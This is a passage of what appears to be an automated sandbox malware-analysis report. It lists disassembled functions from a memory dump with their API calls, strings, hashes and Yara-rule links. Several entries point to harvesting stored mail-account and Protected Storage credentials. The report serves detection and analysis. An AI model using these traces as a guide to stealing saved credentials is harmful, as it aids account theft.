                                                                                                                                                                                                          • Opcode Fuzzy Hash: a75b1e0acb0f5019c960ead13ae6bdef512e97a5dc6b2f82c9c12f4a65331388
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B02160B690115DABDF21EEA8CD40EDF7BADAF88304F0044AAB718E3052D2349F548B64
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040CFC5 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 368790112-0
                                                                                                                                                                                                          • Opcode ID: c734dfea12c93efd70da344448ab0c1d4400440b23c7d083a28a0ad16e48a0bf
                                                                                                                                                                                                          • Instruction ID: 593c26daf5a8157ef64f6677eb97e14ee4fb597551c84e1e3d2c0423d94ab2b3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c734dfea12c93efd70da344448ab0c1d4400440b23c7d083a28a0ad16e48a0bf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE01FCB5A40B0077E235AA35CC03F1A73A4AFD1718F000B1EF252666D2E7BCE509856D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041546A Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 211COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                          • String ID: +MA$psow$winOpen
                                                                                                                                                                                                          • API String ID: 2221118986-3077801942
                                                                                                                                                                                                          • Opcode ID: 6374b3f40517461fab9b1732b79d6ecb0a63dddf6689f58e7f4b53c344f2d528
                                                                                                                                                                                                          • Instruction ID: 627c4099ad4ed317c867b58951a0fc316b0cffc8f2319acf44b2ebd0553f51b9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6374b3f40517461fab9b1732b79d6ecb0a63dddf6689f58e7f4b53c344f2d528
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE718D72D00605EBDF10DFA9DC426DEBBB2AF44314F14412BF915AB291D7788D908B98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0042BB86 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • variable number must be between ?1 and ?%d, xrefs: 0042BC19
                                                                                                                                                                                                          • too many SQL variables, xrefs: 0042BD54
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                          • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                          • API String ID: 2221118986-515162456
                                                                                                                                                                                                          • Opcode ID: 6b88ecb26755f537598d44b059ba5a346278a106570852c9337f2aed9016ab7b
                                                                                                                                                                                                          • Instruction ID: 0d9164a1fdbde5ca3cdd745d30cfe3dc8f536e44641e3c26b790e655cd3eaffd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b88ecb26755f537598d44b059ba5a346278a106570852c9337f2aed9016ab7b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71519D31B00525EFEB19DF69D481BEAB7A0FF08304F90016BE815AB251DB79AD51CBC8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0042F55D Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 143COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                          • String ID: $, $CREATE TABLE
                                                                                                                                                                                                          • API String ID: 3510742995-3459038510
                                                                                                                                                                                                          • Opcode ID: 24e9d051a89d5ebfc294a89d8b696b7cb09e4cb3b50fd414110b2fd0402450e3
                                                                                                                                                                                                          • Instruction ID: 4a0871beed9f250e2dacaf6662beca46c80fe0be2f5bbb48e716de4f7c2f6e71
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24e9d051a89d5ebfc294a89d8b696b7cb09e4cb3b50fd414110b2fd0402450e3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE51B471E00129AFDF10DF94D4815AFB7F5EF45319FA0806BE401EB202E778DA898B99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00402616 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026D6
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040269F
                                                                                                                                                                                                            • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                                                                                                                                                                                            • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                                                                                                                                                                                            • Part of subcall function 0041025A: memcpy.MSVCRT ref: 004102D6
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040278E
                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00402798
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1593657333-0
                                                                                                                                                                                                          • Opcode ID: 16627343bce6d9ca029ba30bb800e57eeae299e547cd663597d7650a0685579b
                                                                                                                                                                                                          • Instruction ID: a31c39db536bf59591fe237cfeb45fd52263bcc442a3b4586f9b541b98436b80
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16627343bce6d9ca029ba30bb800e57eeae299e547cd663597d7650a0685579b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0741C2B1408394AFEB21CF60CD85AAB77DCAB49304F04493FF588A21D1D6B9DA44CB5A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040C5D8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C642
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C686
                                                                                                                                                                                                          • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C6A0
                                                                                                                                                                                                          • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040C743
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3798638045-0
                                                                                                                                                                                                          • Opcode ID: 3a7b9920eb43017b966caaa677d6f3b642cf6e436e0306de547793c3a41d1725
                                                                                                                                                                                                          • Instruction ID: caf6f60f32b19a677c26e4d16bf675fa64e013cae5d841084b333b07d52aaaaa
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a7b9920eb43017b966caaa677d6f3b642cf6e436e0306de547793c3a41d1725
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C41C131500216EBCB35CF24C8C5A96BBA4BF05321F1447B6E958AB2D2C7B99D91CFD8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040B340 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00409B5A: ??2@YAPAXI@Z.MSVCRT ref: 00409B7B
                                                                                                                                                                                                            • Part of subcall function 00409B5A: ??3@YAXPAX@Z.MSVCRT ref: 00409C42
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040B366
                                                                                                                                                                                                          • atoi.MSVCRT ref: 0040B374
                                                                                                                                                                                                          • _mbsicmp.MSVCRT ref: 0040B3C7
                                                                                                                                                                                                          • _mbsicmp.MSVCRT ref: 0040B3DA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4107816708-0
                                                                                                                                                                                                          • Opcode ID: 8fdabe3cb48b7dd5393ce896bc272b4884b8954cc15d75e5f27a23b60337e2cc
                                                                                                                                                                                                          • Instruction ID: f56b49caca625ffb6a8305ca332e6707e3f7b6555e2304d22037ac8df505f121
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fdabe3cb48b7dd5393ce896bc272b4884b8954cc15d75e5f27a23b60337e2cc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC412A75900204EBDB10DF69C581A9DBBF4FB48308F2185BAEC55AB397D738DA41CB98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00443946 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: strlen
                                                                                                                                                                                                          • String ID: >$>$>
                                                                                                                                                                                                          • API String ID: 39653677-3911187716
                                                                                                                                                                                                          • Opcode ID: 3bef562ec1fa0c496d1df37275b1e68b1d7bde60f2b1f93b6d17329dd08051c1
                                                                                                                                                                                                          • Instruction ID: c4e2884265c3a68fdd0446f239628287b972743a9c94721f5bed41ec85a51522
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bef562ec1fa0c496d1df37275b1e68b1d7bde60f2b1f93b6d17329dd08051c1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A313A5184D2C49EFB119F6880457EEFFB14F22706F1886DAC0D167383C2AC9B4AD75A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040CF27 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                          • API String ID: 3510742995-2766056989
                                                                                                                                                                                                          • Opcode ID: 06b8a3ec594aaba049a721ed4dda8e3acd4ed37df7d7103eefb9391fa1074ca8
                                                                                                                                                                                                          • Instruction ID: c67b832eded58a7fed5fb718e1005b1d96f95c91eedcc3159726feab918c483c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06b8a3ec594aaba049a721ed4dda8e3acd4ed37df7d7103eefb9391fa1074ca8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB113BF2900705ABCB248F15CCC095A77A9EB94358B00073FFE06562D1E635DA5986DA
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004076FD Relevance: 6.1, APIs: 4, Instructions: 63stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • strlen.MSVCRT ref: 00407709
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00407729
                                                                                                                                                                                                            • Part of subcall function 00406CCE: malloc.MSVCRT ref: 00406CEA
                                                                                                                                                                                                            • Part of subcall function 00406CCE: memcpy.MSVCRT ref: 00406D02
                                                                                                                                                                                                            • Part of subcall function 00406CCE: ??3@YAXPAX@Z.MSVCRT ref: 00406D0B
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040774C
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040776C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1171893557-0
                                                                                                                                                                                                          • Opcode ID: 362879045fdc860860f3123a44022f3e2572d0f7ada27b379acf8bf4c70500ed
                                                                                                                                                                                                          • Instruction ID: 5e9a081d75c64704428ce8041afbbeb9d52fcced2ab343c8e96fa08cc39daf7c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 362879045fdc860860f3123a44022f3e2572d0f7ada27b379acf8bf4c70500ed
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E411DF71200600DFD730EF18D981D9AB7F5EF443247108A2EF552A7692C736B919CB54
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00407D33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1865533344-0
                                                                                                                                                                                                          • Opcode ID: 6af0d80cf1f9a4abb6ff5f9bc8d9616050e1b27e252b80ccf982e962f70df596
                                                                                                                                                                                                          • Instruction ID: e24a5276dafad98c161ef6ad34afde8f808320b1c4234a0015a7989cc473ef50
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6af0d80cf1f9a4abb6ff5f9bc8d9616050e1b27e252b80ccf982e962f70df596
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12118C71608601AFD328CF2DC881A27F7E9FFD8300B20892EE59A87395DA35E801CB15
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00410880 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 00410890
                                                                                                                                                                                                          • SHBrowseForFolder.SHELL32(?), ref: 004108C2
                                                                                                                                                                                                          • SHGetPathFromIDList.SHELL32(00000000,?), ref: 004108D6
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004108E9
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1479990042-0
                                                                                                                                                                                                          • Opcode ID: 3753829cb073f40f4471594610d53b7e9f12ad6488aa9b3d51b15237d3a7a1f5
                                                                                                                                                                                                          • Instruction ID: 22dc721301a1029169844026e50c0f3522bcecfb2be71eae7d1720ca74c813ee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3753829cb073f40f4471594610d53b7e9f12ad6488aa9b3d51b15237d3a7a1f5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D311FAB5900208AFDB00DFA9D8849EEBBFCFB49314B10406AEA05E7201D774DA45CFA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040B65E Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                            • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040B684
                                                                                                                                                                                                          • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                                                                                                                                                                                            • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                            • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040B6AE
                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040B6C1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 203655857-0
                                                                                                                                                                                                          • Opcode ID: fd7c26483e5a1075d55b25fd65a92633a23fb1db18fe9454acdb9c540dc78240
                                                                                                                                                                                                          • Instruction ID: c6c9d64871d24126578c2fffe8df42e6a01bd33b4583c5a66007e13a3507ac6b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd7c26483e5a1075d55b25fd65a92633a23fb1db18fe9454acdb9c540dc78240
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA018BB650030467EB21B775CC86FE773ACAB04304F04047BB656F51D3DA79E9848A6D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040AB21 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040AB44
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040AB5A
                                                                                                                                                                                                            • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                                            • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040AB84
                                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                          • String ID: </%s>
                                                                                                                                                                                                          • API String ID: 3699762281-259020660
                                                                                                                                                                                                          • Opcode ID: aa9275fcc028cffcefa48dde5847177ad6754b943bb00a3c6bf4d2e50bcd3c7a
                                                                                                                                                                                                          • Instruction ID: 40662a85ba39df66ab9e9dfe1085b05053bd092a42c83a93ebfe6a452f4dfa53
                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa9275fcc028cffcefa48dde5847177ad6754b943bb00a3c6bf4d2e50bcd3c7a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F501F9729001296BE720A659DC45FDA776CAF45304F0400FAB60DF3182DB749E548BA5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0044497B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                          • Opcode ID: 6e69610b48158ddd1cace260c8b8c9f990ff9e3410e7d4f8ed62e5c6a57ef570
                                                                                                                                                                                                          • Instruction ID: 50686d444a9e23a331db2cec4592ac0caeb7afc27ca0d185df797a95cebddf31
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e69610b48158ddd1cace260c8b8c9f990ff9e3410e7d4f8ed62e5c6a57ef570
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70E0E6A170470196BA24ABBFBD55B1723ECAA84B66314092FB508D72B2DF2CD864D52C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004021F6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _ultoasprintf
                                                                                                                                                                                                          • String ID: %s %s %s
                                                                                                                                                                                                          • API String ID: 432394123-3850900253
                                                                                                                                                                                                          • Opcode ID: da56d414bae2e0ef01a77ba25b2d24ae14ce975277d8d1cdc00a6dd34e745ad8
                                                                                                                                                                                                          • Instruction ID: 4eecb7ebe0e72788cc5a9ba801a24b7f953e3738518a64b6aa949e1543d7b5d3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: da56d414bae2e0ef01a77ba25b2d24ae14ce975277d8d1cdc00a6dd34e745ad8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD41C431804A1987D538D5B4878DBEB62A8A702304F5504BFEC9AB32D1D7FCAE45866E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004086A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                                                                                                                                                                                            • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                                                                                                                                                                                            • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                                                                                                                                                                                            • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?), ref: 0040870D
                                                                                                                                                                                                            • Part of subcall function 0040767C: ??3@YAXPAX@Z.MSVCRT ref: 00407683
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$??3@$??2@CloseCreateHandleReadSize
                                                                                                                                                                                                          • String ID: C@
                                                                                                                                                                                                          • API String ID: 1449862175-3201871010
                                                                                                                                                                                                          • Opcode ID: 05e9bc18889996fc1c644d7848b4516204ab87caed7d052ccf358956a64e1b41
                                                                                                                                                                                                          • Instruction ID: 7447114fd14c0d02a0ee842544e77a6286768af896f3cc7789f687588c6d710a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05e9bc18889996fc1c644d7848b4516204ab87caed7d052ccf358956a64e1b41
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88018871C04118AFDB00AF65DC45A8F7FB8DF05364F11C166F855B7191DB349A05CBA5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00409669 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00409682
                                                                                                                                                                                                          • SendMessageA.USER32(5\@,00001019,00000000,?), ref: 004096B0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
